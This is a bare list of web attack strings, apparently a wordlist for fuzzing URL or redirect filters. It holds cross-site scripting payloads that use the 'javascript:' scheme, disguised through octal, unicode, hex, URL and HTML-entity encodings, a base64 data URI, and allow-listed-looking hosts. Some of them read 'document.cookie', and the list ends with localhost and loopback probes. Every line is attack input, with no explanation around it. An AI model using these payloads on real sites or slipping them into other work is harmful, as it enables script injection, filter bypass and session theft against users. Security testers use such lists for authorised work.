\152\141\166\141\163\143\162\151\160\164\072alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
ja\nva\tscript\r:alert(1)
java%09script:alert(1)
java%0ascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
java%0dscript:alert(1)
Javas%26%2399;ript:alert(1)
javascript://%0aalert(1)
javascript://%250A1?alert(1):0
javascript://%250Aalert(1)
javascript://%250Aalert(1)//?1
javascript://%250Alert(document.location=document.cookie)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript://google.com?%a0alert%281%29
jaVAscript://google.com//%0d%0aalert(1);//
javascript://https://google.com/?z=%0Aalert(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript://whitelisted.com?%a0alert%281%29
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript:alert(1)
javascript:alert(1);
javascript:confirm(1)
javascript:prompt(1)
";alert(0);//
localhost
127.0.0.1